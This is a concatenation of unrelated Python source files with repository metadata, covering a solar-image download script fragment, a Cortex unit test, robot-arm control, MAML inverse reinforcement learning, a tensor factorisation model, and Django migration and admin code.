if exists:#if a fits file no longer exists, it will be downloaded as an empty .1 file. this deletes .1 files
os.remove(fits_dir + '.1')
raise ValueError('Fits file no longer exists. Deleting downloaded file...')
except:#if files are missing from the server, the export call fails. this keeps track of missing files
if (chunk_size == 1):
missing_files.append(current_timestring)
else:
download(current_time,end_time,chunk_size//2,time_interval)
current_time = end_time
download(start,end,chunk_size,time_interval)
print(missing_files)
#delete all duplicate files
test = os.listdir(fits_dir)
for item in test:
if item.endswith(".1"):
os.remove(os.path.join(fits_dir, item))
Xdata_dir = workdir + 'Xdata/'
if not os.path.exists(Xdata_dir):
os.mkdir(Xdata_dir)
print("Directory " + Xdata_dir + "does not exist. Creating...")
fits_filenames = os.listdir(fits_dir)
resizing = [256]
for resize in resizing:
resize_dir = Xdata_dir + str(resize)
if os.path.exists(resize_dir):#delete any resizing directories matching the new resizes
shutil.rmtree(resize_dir)
os.makedirs(resize_dir)#creates new resize directories
for filename in fits_filenames: #iterates over fits files and converts to a numpy array
hmi_map = Map(fits_dir + filename)
rotateddata90 = hmi_map.rotate(angle=90*u.deg, order = 0)
rotateddata180 = rotateddata90.rotate(angle=90*u.deg, order = 0)
data = rotateddata180.data
data[np.where(np.isnan(data))] = 0.0 # replacing nans with 0s
print('saving '+filename +' in sizes'+ str(resizing))
for resize in resizing:#resizes and saves numpy array data into given resizes
resized_image = np.array(Image.fromarray(data).resize((resize,resize),Image.LANCZOS))
np.save(Xdata_dir + str(resize) + '/' + filename[:26] + '_'+ str(resize), resized_image)#saves series,time,and resize | [
"jiwon.christine.park@gmail.com"
] | jiwon.christine.park@gmail.com |
97176f4b2cf2a2706ba0989eee781b449a4cf6b0 | 14cdc1353affd01ec9f96c31cd51549d82364b2c | /test/IECore/OptionsTest.py | f257f594de42cc75781eb2db60bfa267e5f96a44 | [] | no_license | dsparrow27/cortex | f787cdcc271388986cd24ee27b48999ae71ef194 | 5e985efa860aec22a0c8ec6cebf9e682f65eca73 | refs/heads/master | 2021-08-19T06:30:36.881268 | 2017-11-23T08:26:13 | 2017-11-23T08:26:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,627 | py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
class OptionsTest( unittest.TestCase ) :
def testCopy( self ) :
o = IECore.Options()
o.options["test"] = IECore.FloatData( 10 )
oo = o.copy()
self.assertEqual( o, oo )
def testConstructFromDict( self ) :
o = IECore.Options( {
"a" : IECore.StringData( "a" ),
"b" : IECore.IntData( 10 ),
} )
self.assertEqual( len( o.options ), 2 )
self.assertEqual( o.options["a"], IECore.StringData( "a" ) )
self.assertEqual( o.options["b"], IECore.IntData( 10 ) )
def testHash( self ) :
o1 = IECore.Options()
o2 = IECore.Options()
self.assertEqual( o1.hash(), o2.hash() )
o1.options["a"] = IECore.StringData( "a" )
self.assertNotEqual( o1.hash(), o2.hash() )
o2.options["a"] = IECore.StringData( "a" )
self.assertEqual( o1.hash(), o2.hash() )
if __name__ == "__main__":
unittest.main()
| [
"thehaddonyoof@gmail.com"
] | thehaddonyoof@gmail.com |
583da391bcd6fac86e125c68704ba1188b5c76af | 25112659fe41d94b5c046f0a17d6508a218f920a | /controllers/practica_3_1/funciones_manipulador.py | d4b3e89f271fce08031a8e993cd559860a723052 | [] | no_license | lfrecalde1/KUKA_YOU_BOT_MANIPULADOR | c5e36bf2750484a2726cad707bd90f9b1eecdf9f | 5200b80c3c1fbdf5a760b1ac6fe378b5767fadac | refs/heads/main | 2023-01-11T12:40:36.195768 | 2020-11-24T03:43:31 | 2020-11-24T03:43:31 | 315,459,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,866 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
def grafica(sty,titulo,x,y,z,etiqueta,ejex,ejey,ejez,color):
mpl.style.use(sty)
ax=plt.axes(projection="3d")
ax.set_title(titulo.format(sty), color='0')
ax.set_xlabel(ejex)
ax.set_ylabel(ejey)
ax.set_zlabel(ejez)
ax.plot3D(x, y, z, color, label=etiqueta)
ax.grid(linestyle='--', linewidth='0.3', color='black')
legend = ax.legend(loc='upper right', shadow=False, fontsize='small')
plt.show()
def grafica_c(sty,titulo,x,y,z,etiqueta,ejex,ejey,ejez,color,x_1,y_1,z_1,etiqueta_1,color_1):
mpl.style.use(sty)
ax=plt.axes(projection="3d")
ax.set_title(titulo.format(sty), color='0')
ax.set_xlabel(ejex)
ax.set_ylabel(ejey)
ax.set_zlabel(ejez)
ax.plot3D(x,y,z, color, label=etiqueta)
ax.plot3D(x_1,y_1,z_1,color_1,label=etiqueta_1)
ax.grid(linestyle='--', linewidth='0.2', color='black')
legend = ax.legend(loc='upper right', shadow=False, fontsize='small')
plt.show()
def home(arm_elements,tiempo_home,robot):
# Envio de las velocidades de cada articualcion
t_sample=0.1
t_final=tiempo_home+t_sample
t=np.arange(0,t_final,t_sample)
t=t.reshape(1,t.shape[0])
timestep = int(95)# 100 milisegundos equivale a 0.1 segundos
for k in range(0,t.shape[1]):
if robot.step(timestep) != -1:
# Envio de las velocidades de cada articualcion
arm_elements[0].setVelocity(0.5)
arm_elements[1].setVelocity(0.5)
arm_elements[2].setVelocity(0.5)
arm_elements[3].setVelocity(0.5)
arm_elements[4].setVelocity(0.5)
# ENvio de posiciones para las articulaciones
arm_elements[0].setPosition(0)
arm_elements[1].setPosition(float(-np.pi/4))
arm_elements[2].setPosition(float(-np.pi/4))
arm_elements[3].setPosition(float(-np.pi/8))
arm_elements[4].setPosition(float(0))
print("SYSTEM HOME")
def controlador(h,hd,hdp,q,qd,l0,l1,a1,l2,l3,l4,k1,k2,k3,k4):
K1=k1*np.eye(3,3)
K2=k2*np.eye(3,3)
K3=k3*np.eye(5,5)
K4=k4*np.eye(5,5)
W=np.eye(5,5)
W_1=np.linalg.inv(W)
herr=hd-h
nulo=qd-q
I=np.eye(5,5)
J11=np.sin(q[0,0])*(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0])-a1)
J12=-np.cos(q[0,0])*(l2*np.cos(q[1,0])+l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J13=-np.cos(q[0,0])*(l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J14=-np.cos(q[0,0])*(l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J15=0
J21=-np.cos(q[0,0])*(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0])-a1)
J22=-np.sin(q[0,0])*(l2*np.cos(q[1,0])+l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J23=-np.sin(q[0,0])*(l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J24=-np.sin(q[0,0])*(l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
J25=0
J31=0
J32=-(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
J33=-(l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
J34=-(l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
J35=0
J=np.matrix([[J11,J12,J13,J14,J15],[J21,J22,J23,J24,J25],[J31,J32,J33,J34,J35]])
J_m=W_1@J.transpose()@np.linalg.inv(J@W_1@J.transpose())
control=J_m@(hdp+K2@np.tanh(np.linalg.inv(K2)@K1@herr))+(I-J_m@J)@K3@np.tanh(np.linalg.inv(K3)@K4@nulo)
return control[0,0], control[1,0], control[2,0], control[3,0], control[4,0]
def euler(z,zp,t_sample):
z=z+zp*t_sample
return z
def tranformacion_cordenadas(x,y,z,phi):
T=np.matrix([[np.cos(phi),-np.sin(phi),0],[np.sin(phi),np.cos(phi),0],[0,0,1]])
relativo=np.array([[x],[y],[z]])
real=T@relativo
return real[0,0],real[1,0],real[2,0] | [
"lfrecalde1@espe.edu.ec"
] | lfrecalde1@espe.edu.ec |
d5604b226c72488919b888f5ef1f7ef51ab130b7 | 1631ca8e5cc7fa7e7d2ac307fefab490bb307ab7 | /function_filePathCheck.py | dad0375d21938bb07060cf5ca7394f61692c2190 | [] | no_license | jacksalssome/StandardFormatTranscoder | 5350d7ba1edf05f58299619d350df6fa53946008 | 29e6a38f0326301743c99b0cb65a0872e1fc7984 | refs/heads/main | 2023-07-16T01:56:26.790527 | 2023-07-08T15:28:49 | 2023-07-08T15:28:49 | 321,584,824 | 14 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,267 | py | from colorama import Fore
import sys
import re
import os
def filePathCheck(currentOS, inputArg):
if currentOS == "Windows" and len(inputArg) <= 3: # <= 3 equals C:\ (root dir)
print(Fore.YELLOW + "Can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"D:\\folder\"")
elif currentOS == "Windows" and len(inputArg) <= 4 and re.search("[A-Z][A-Z]:\\\\", str(inputArg)): # <= 4 equals AB:\ (root dir)
print(Fore.YELLOW + "Nice drive letters, but can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"D:\\folder\"")
elif currentOS == "Linux" and len(inputArg) <= 1: # <= 2 equals / (root dir)
print(Fore.YELLOW + "Can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"/home\"")
else:
print(Fore.YELLOW + "Can't find file path: \"" + Fore.RESET + inputArg + Fore.YELLOW + "\"" + Fore.RESET)
print(Fore.YELLOW + "Note: this program doesn't create directories" + Fore.RESET)
input("Press Enter to exit...")
sys.exit()
def checkIfPathIsAFile(Directory, typeOfDirectory):
if os.path.isfile(Directory): # If user puts in a link to a single file
if typeOfDirectory == "input":
print(Fore.YELLOW + "Cant handle direct files, only the directory they are in." + Fore.RESET)
print(Fore.YELLOW + "Would you like to use this directory: " + Fore.RESET + "\"" + os.path.dirname(Directory) + "\"" + Fore.YELLOW + "? [Y/N]" + Fore.RESET)
elif typeOfDirectory == "output":
print(Fore.YELLOW + "Output to a single file, only to a directory." + Fore.RESET)
print(Fore.YELLOW + "Would you like to output to this directory: " + Fore.RESET + "\"" + os.path.dirname(Directory) + "\"" + Fore.YELLOW + "? [Y/N]" + Fore.RESET)
else:
breakpoint()
answerYN = None
while answerYN not in ("yes", "no", "y", "n"):
answerYN = input()
if answerYN == "yes" or answerYN == "y":
Directory = os.path.dirname(Directory) # Trim input dir to the dir of the inputted file
elif answerYN == "no" or answerYN == "n":
sys.exit()
else:
print("Please enter yes or no.")
return Directory
| [
"jacksalssome@hotmail.com"
] | jacksalssome@hotmail.com |
1aa86a3850c8d370b0a3bfe7231bb14804fde80b | 248e87db5d7819962ca9b68afcb5b33cb68d219f | /apps/login_regis/migrations/0001_initial.py | 6337eb3cbf6404875506ae744b04e8388079e209 | [] | no_license | Acyu83/pythonblackbelt2 | c4b2ca571a516a3aec3178d2970582b8071390e6 | 0e1732d099327af4bf23abaaaf5304a458a833ba | refs/heads/master | 2021-01-17T11:10:10.999793 | 2017-03-06T03:56:41 | 2017-03-06T03:56:41 | 84,026,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 887 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-22 21:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"acyu83@gmail.com"
] | acyu83@gmail.com |
49716fffe1d3d747365e83abe99f48f2a62222a2 | be5c86e8fe3f5836b7d2097dd5272c72b5b28f15 | /binary-search/Python/0374-guess-number-higher-or-lower.py | bca7b49cffd223314f15f7da64b8be501150cf07 | [
"Apache-2.0"
] | permissive | lemonnader/LeetCode-Solution-Well-Formed | d24674898ceb5441c036016dc30afc58e4a1247a | baabdb1990fd49ab82a712e121f49c4f68b29459 | refs/heads/master | 2021-04-23T18:49:40.337569 | 2020-03-24T04:50:27 | 2020-03-24T04:50:27 | 249,972,064 | 1 | 0 | Apache-2.0 | 2020-03-25T12:26:25 | 2020-03-25T12:26:24 | null | UTF-8 | Python | false | false | 523 | py | # The guess API is already defined for you.
# @param num, your guess
# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0
def guess(num):
pass
class Solution(object):
def guessNumber(self, n):
left = 1
right = n
while left < right:
mid = (left + right) >> 1
if guess(mid) == 1:
left = mid + 1
else:
right = mid
# 最后剩下的数一定是所求,无需后处理
return left
| [
"121088825@qq.com"
] | 121088825@qq.com |
1095576a2812ddaaae40317c51f9a41d639a7ada | bbb68a670f242fe80f321d85701a917e670847d5 | /library_app/models/library_book.py | 84057c5674df74b47245046868fb8d182892b985 | [] | no_license | Aaron-97/test | 7f3606f6fe51797d1d8329ff790e9cd47f512a65 | c7bcfab9280fbc760499cb94acf56f75f14d00b9 | refs/heads/master | 2023-01-09T23:40:07.239037 | 2020-11-09T08:03:59 | 2020-11-09T08:03:59 | 311,197,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,240 | py | from odoo import api, fields, models
from odoo.exceptions import Warning, ValidationError
class Book(models.Model):
_name = 'library.book'
_description = 'Book'
# String fields
name = fields.Char('Title', required=True)
isbn = fields.Char('ISBN')
book_type = fields.Selection(
[('paper', 'Paperback'),
('hard', 'Hardcover'),
('electronic', 'Electronic'),
('other', 'Other')],
'Type')
notes = fields.Text('Internal Notes')
descr = fields.Html('Description')
# Numeric fields:
copies = fields.Integer(default=1)
avg_rating = fields.Float('Average Rating', (3,2))
price = fields.Monetary('Price', 'currency_id')
currency_id = fields.Many2one('res.currency')
# Date and time fields
date_published = fields.Date()
last_borrow_date = fields.Datetime(
'Last Borrowed On',
default=lambda self: fields.Datetime.now())
# Other fields
active = fields.Boolean('Active?', default=True)
image = fields.Binary('Cover')
publisher_id = fields.Many2one('res.partner', string='Publisher')
author_ids = fields.Many2many('res.partner', string='Authors')
def _check_isbn(self):
self.ensure_one()
isbn = self.isbn.replace('-', '')
digits = [int(x) for x in isbn if x.isdigit()]
if len(digits) == 13:
ponderations = [1, 3] * 6
terms = [a * b for a, b in zip(digits[:13], ponderations)]
remain = sum(terms) % 10
check = 10 - remain if remain != 0 else 0
return digits[-1] == check
def button_check_isbn(self):
for book in self:
if not book.isbn:
raise Warning('Please provide an ISBN for %s' % book.name)
if book.isbn and not book._check_isbn():
raise Warning('%s is an invalid ISBN' % book.isbn)
return True
publisher_country_id = fields.Many2one(
'res.country', string='Publisher Country',
compute='_compute_publisher_country',
# store = False, # 默认不在数据库中存储
inverse='_inverse_publisher_country',
search='_search_publisher_country',
)
@api.depends('publisher_id.country_id')
def _compute_publisher_country(self):
for book in self:
book.publisher_country_id = book.publisher_id.country_id
def _inverse_publisher_country(self):
for book in self:
book.publisher_id.country_id = book.publisher_country_id
def _search_publisher_country(self, operator, value):
return [('publisher_id.country_id', operator, value)]
_sql_constraints = [
('library_book_name_date_uq', # 约束唯一标识符
'UNIQUE (name, date_published)', # 约束 SQL 语法
'Book title and publication date must be unique'), # 消息
('library_book_check_date',
'CHECK (date_published <= current_date)',
'Publication date must not be in the future'),
]
@api.constrains('isbn')
def _constrain_isbn_valid(self):
for book in self:
if book.isbn and not book._check_isbn():
raise ValidationError('%s is an invalid ISBN' % book.isbn)
| [
"2291177920@qq.com"
] | 2291177920@qq.com |
a8e39f0d7e65c4e87997c24e78265589babf0581 | 97841ea896bad4098350243e35580e8fe968d220 | /src/maml.py | 6007461a4f3e693525956861b8287af22655668f | [
"MIT"
] | permissive | gthecht/mandril-project | f5863ac5caee4789b439b4b20f3f288d780df3ba | b1232706d8b77210ec3ed2fee4d809f2faacdd3e | refs/heads/main | 2023-03-19T05:24:49.345063 | 2021-02-28T18:26:52 | 2021-02-28T18:26:52 | 313,941,452 | 0 | 0 | MIT | 2020-12-09T14:48:51 | 2020-11-18T13:21:42 | null | UTF-8 | Python | false | false | 9,297 | py | #!/usr/bin/env python
import utils
import solver as Solver
import gridworld as World
import gaussianfit as Gfit
import numpy as np
import matplotlib.pyplot as plt
import time
class Mandril:
def __init__(
self,
N=100,
batch_size=20,
meta_lr=0.1,
size=5,
p_slip=0,
terminal=None,
debug=False,
theta=None,
discount=0.7,
draw=False,
validate_step=100000,
model="Gaussian"
):
self.N = N
self.batch_size = batch_size
self.meta_lr = meta_lr
self.size = size
self.p_slip = p_slip
self.terminal = terminal
self.debug = debug
self.theta = theta
self.discount = discount
self.draw = draw
self.validate_step = validate_step
self.model = model
def maml(self, theta=None):
if theta is None: theta = self.theta
data = {
"thetas": [],
"groundTruthReward": [],
"phi_loss": [],
"reg_loss": [],
"mamlReward": [],
"regularReward": [],
"worlds": [],
"validation_score": [],
"regular_score": [],
"policy_score": [],
"reg_policy_score": []
}
valid_data = {
"thetas": [],
"groundTruthReward": [],
"phi_loss": [],
"reg_loss": [],
"mamlReward": [],
"regularReward": [],
"worlds": [],
"validation_score": [],
"regular_score": [],
"policy_score": [],
"reg_policy_score": []
}
for ind in range(self.N):
if self.debug: print("Iteration #{0}".format(ind))
theta = self.maml_step(data, theta)
if ind % self.validate_step == 0:
print("Validation for step #{0}".format(ind))
real_debug = self.debug
self.debug = True
_ = self.maml_step(valid_data, theta)
self.debug = real_debug
return data, valid_data
def maml_step(self, data, theta):
startTime = time.time()
theta, phi, theta_regular, gt_reward, world, phi_loss, reg_loss = self.maml_iteration(theta)
# rewards:
features = World.state_features(world)
mamlReward = features.dot(phi)
regularReward = features.dot(theta_regular)
validation_score, regular_score, policy_score, reg_policy_score = self.calc_rewards(
world,
gt_reward,
mamlReward,
regularReward
)
data["thetas"].append(theta.copy())
data["groundTruthReward"].append(gt_reward)
data["phi_loss"].append(phi_loss)
data["reg_loss"].append(reg_loss)
data["mamlReward"].append(mamlReward)
data["regularReward"].append(regularReward)
data["worlds"].append(world)
data["validation_score"].append(validation_score)
data["regular_score"].append(regular_score)
data["policy_score"].append(policy_score)
data["reg_policy_score"].append(reg_policy_score)
executionTime = (time.time() - startTime)
if self.debug:
print('Execution time: {0} (sec) - \
policy score: {1}, regular policy score: {2}'.
format(
round(executionTime, 2),
policy_score,
reg_policy_score
)
)
return theta
def maml_iteration(self, theta):
# set-up mdp
world, reward, terminal = utils.setup_mdp(self.size, self.p_slip, location=self.terminal)
# get expert trajectories
trajectories, expert_policy = utils.generate_trajectories(
world,
reward,
terminal,
n_trajectories=self.batch_size,
discount=self.discount
)
# optimize with maxent
phi, phi_reward = utils.maxent(
world,
terminal,
trajectories,
theta
)
phi_loss = self.get_loss(world, reward, phi_reward)
# Get a theta for an untrained init:
theta_regular, reg_reward = utils.maxent(
world,
terminal,
trajectories
)
reg_loss = self.get_loss(world, reward, reg_reward)
if self.draw: utils.plot_rewards(world, reward, expert_policy, trajectories, phi, theta_regular)
# update theta:
theta = self.update_theta(theta, phi, self.meta_lr, phi_loss)
phi = self.update_theta(None, phi, self.meta_lr, phi_loss)
theta_regular = self.update_theta(None, theta_regular, self.meta_lr, reg_loss)
if self.debug: print("phi loss: {0} : regular loss: {1}".format(phi_loss, reg_loss))
return theta, phi, theta_regular, reward, world, phi_loss, reg_loss
def get_loss(self, world, gt_reward, reward):
# Calculate loss:
optimal_policy_value = Solver.optimal_policy_value(world, gt_reward, self.discount)
maxent_policy_value = Solver.optimal_policy_value(world, reward, self.discount)
# validate
loss = self.validate(world, optimal_policy_value, maxent_policy_value)
return loss
def update_theta(self, theta, phi, meta_lr, loss):
"""
Update theta
"""
# normalize phi
phi = phi / phi.max()
if theta is None: theta = phi #/ phi.shape[0]
if self.model == "Gaussian":
phi_mat = phi.reshape(int(np.sqrt(phi.shape[0])), -1)
gauss_phi = Gfit.fitgaussian(phi_mat)
# phi_fit = Gfit.gaussGrid(phi_mat.shape, *gauss_phi)
theta_mat = theta.reshape(int(np.sqrt(theta.shape[0])), -1)
gauss_theta = Gfit.fitgaussian(theta_mat)
# theta = theta + meta_lr * (phi - theta)
gauss_theta = gauss_theta + loss * meta_lr * (gauss_phi - gauss_theta)
theta_mat = Gfit.gaussGrid(phi_mat.shape, *gauss_theta)
theta = theta_mat.reshape(-1)
# normalize theta:
theta = theta / theta.max()
elif self.model == "Naive":
theta = theta + loss * meta_lr * (phi - theta)
else:
raise ValueError("model is undefined")
return theta
def validate(self, world, optimal_policy_value, agent_policy_value):
agent_policy = np.array([
np.argmax([agent_policy_value[world.state_index_transition(s, a)] for a in range(world.n_actions)])
for s in range(world.n_states)
])
optimal_options = []
for s in range(world.n_states):
values = [optimal_policy_value[world.state_index_transition(s, a)] for a in range(world.n_actions)]
optimal_options.append(np.argwhere(values == np.amax(values)))
# compare the policies, remember that the terminal state's policy is unneeded
error_num = sum([agent_policy[s] not in optimal_options[s] for s in range(world.n_states)])
return error_num / self.size**2
def calc_rewards(self, world, gt_reward, maml_reward, reg_reward):
# optimal policy:
optimal_policy_value = Solver.optimal_policy_value(world, gt_reward, self.discount)
maxent_policy_value = Solver.optimal_policy_value(world, maml_reward, self.discount)
reg_maxent_policy_value = Solver.optimal_policy_value(world, reg_reward, self.discount)
# validate
policy_score = self.validate(world, optimal_policy_value, maxent_policy_value)
reg_policy_score = self.validate(world, optimal_policy_value, reg_maxent_policy_value)
validation_score = sum((maml_reward - gt_reward)**2)
regular_score = sum((reg_reward - gt_reward)**2)
return validation_score, regular_score, policy_score, reg_policy_score
#%% MAIN
if __name__ == '__main__':
startTime = time.time()
# parameters
size = 5
p_slip = 0.5
N = 10
validate_step = 2
batch_size = 10
meta_lr = 0.1
terminal = None
debug = False
model = "Naive"
# Mandril class:
mandril = Mandril(
N=N,
batch_size=batch_size,
meta_lr=meta_lr,
size=size,
p_slip=p_slip,
terminal=terminal,
debug=debug,
validate_step=validate_step,
model=model
)
# run maml:
data, valid_data = mandril.maml()
# Print output:
print('Theta: {0}'.format(data["thetas"][-1]))
executionTime = (time.time() - startTime)
print("mean validations per tenths:")
print([np.round(np.mean(data["policy_score"][int(N / 10) * i :
int(N / 10) * (i + 1)]), 2) for i in range(10)])
print("Regular maxent:")
print([np.round(np.mean(data["reg_policy_score"][int(N / 10) * i :
int(N / 10) * (i + 1)]), 2) for i in range(10)])
print('Total execution time: {0} (sec)'.format(executionTime))
fig = plt.figure(figsize=(12,8))
plt.plot(range(N), data["phi_loss"][:N], data["reg_loss"][:N])
plt.legend(["phi_loss", "reg_loss"])
plt.title("Loss for mandril, vs. loss for regular maxent for p_slip of: {0}".format(p_slip))
plt.show() | [
"gdhecht@gmail.com"
] | gdhecht@gmail.com |
f70776b1699a7ac825b34acd41be2609e970d1fc | 507e912bc890813f138b019b9afe30456b02a1f7 | /pycfm/model.py | b3e02521f39d74116b80a00cd2f58d6587a04667 | [
"BSD-3-Clause"
] | permissive | nils-werner/pyCFM | 0393f8629883a3ffd440988171a7e105aa191de8 | 130eaf8b9ec819d44ce574cf97aa97b06e4d7ede | refs/heads/master | 2021-01-20T16:30:49.571668 | 2016-03-11T15:01:36 | 2016-03-11T15:01:36 | 53,676,018 | 0 | 0 | null | 2016-03-11T15:21:14 | 2016-03-11T15:21:14 | null | UTF-8 | Python | false | false | 3,189 | py | import numpy as np
import tqdm
try:
from opt_einsum import contract as einsum
except ImportError:
from numpy import einsum
def hat(P, At, Ac, eps=None):
if eps is None:
eps = np.finfo(float).eps
return eps + einsum('abfj,tj,cj->abftc', P, At, Ac)
def nnrandn(shape):
"""generates randomly a nonnegative ndarray of given shape
Parameters
----------
shape : tuple
The shape
Returns
-------
out : array of given shape
The non-negative random numbers
"""
return np.abs(np.random.randn(*shape))
class CFM(object):
"""The Common Fate model
Vj(a,b,f,t,c) = P(a,b,f,j)At(t,j)Ac(c,j)
So we have one modulation texture "shape" for each frequency,
hence P(a,b,f,j) which is activated over time, this is At(t,j) and over
channels, this is Ac(c,j)
Parameters
---------
data_shape : iterable
A tuple of integers representing the shape of the
data to approximate
n_components : int > 0
the number of latent components for the NTF model
positive integer
beta : float
The beta-divergence to use. An arbitrary float, but not
that non-small integer values will significantly slow the
calculation down. Particular cases of interest are:
* beta=2 : Euclidean distance
* beta=1 : Kullback Leibler
* beta=0 : Itakura-Saito
"""
def __init__(
self,
data,
nb_components,
nb_iter=100,
beta=1,
P=None,
At=None,
Ac=None,
):
# General fitting parameters
self.data = data
self.nb_components = nb_components
self.beta = float(beta)
self.nb_iter = nb_iter
# Factorisation Parameters
if P is None:
self.P = nnrandn(self.data.shape[:3] + (nb_components,))
else:
self.P = P
if At is None:
self.At = nnrandn((self.data.shape[3], nb_components))
else:
self.At = At
if Ac is None:
self.Ac = nnrandn((self.data.shape[4], nb_components))
else:
self.Ac = Ac
def fit(self):
"""fits a common fate model to
Z(a,b,f,t,i) = P(a,b,j)Af(f,j)At(t,j)Ac(i,j)
"""
def MU(einsumString, Z, factors):
Zhat = hat(self.P, self.At, self.Ac)
return (
einsum(
einsumString,
self.data * (Zhat ** (self.beta - 2)),
*factors) /
einsum(
einsumString,
Zhat ** (self.beta - 1),
*factors
)
)
for it in tqdm.tqdm(range(self.nb_iter)):
self.P *= MU('abftc,tj,cj->abfj', self.data, (self.At, self.Ac))
self.At *= MU('abftc,abfj,cj->tj', self.data, (self.P, self.Ac))
self.Ac *= MU('abftc,abfj,tj->cj', self.data, (self.P, self.At))
return self
@property
def factors(self):
return (self.P, self.At, self.Ac)
@property
def approx(self):
return hat(self.P, self.At, self.Ac)
| [
"mail@faroit.com"
] | mail@faroit.com |
83027b62ac40aff7b463752f943ed54795863c91 | d5ef24edc540f4dcc48a26d19ee95a3de302c55f | /classes/objects/Classroom.py | 96551c65cd65075058e117a098ab409e31365ec2 | [] | no_license | Yoske62/nadav | 526275e1501116263d4b293b0308f52bd7bd9848 | 588fcd7f509da111f82cbea2788c6940f645233c | refs/heads/master | 2020-03-27T21:06:55.690948 | 2018-09-09T05:35:48 | 2018-09-09T05:35:48 | 147,115,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | class Classroom(object):
def __init__(self,Id: int, Name: str, Capacity: int, Notes: str):
self.Id = Id
self.Name = Name
self.Capacity = Capacity
self.Notes = Notes | [
"yoske62@gmail.com"
] | yoske62@gmail.com |
1fdeb7595c4c3e0ed8c1014b6e108291cd62d892 | c745592e6002d0efb6b18a71554ec1e6bebf8ca4 | /article/admin.py | 492755ed705d3411707556cec007becb084f6c0a | [] | no_license | Melish76/FirstProject_DJ | c001715c6178e868789084fc16f7b01a8974609a | e38e1d8f83f9132f0f98cec0e41c4515681616e9 | refs/heads/master | 2020-09-29T04:49:33.248469 | 2019-12-09T21:32:37 | 2019-12-09T21:32:37 | 226,955,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.contrib import admin
from .models import Article,Comment
# Register your models here.
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
list_display=["title","author","created_date","content"]
list_display_links=["title","created_date"]
search_fields=["title"]
list_filter=["created_date","title"]
class Meta:
model=Article
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display=["comment_author","comment_content","comment_date"]
list_display_links=["comment_author","comment_content"]
class Meta:
model=Comment | [
"meleyke.huseynova03@gmail.com"
] | meleyke.huseynova03@gmail.com |
